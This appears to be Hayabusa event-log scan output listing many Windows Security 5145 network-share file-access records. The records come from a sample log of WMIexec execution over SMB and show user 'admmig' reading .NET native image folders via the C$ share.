2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
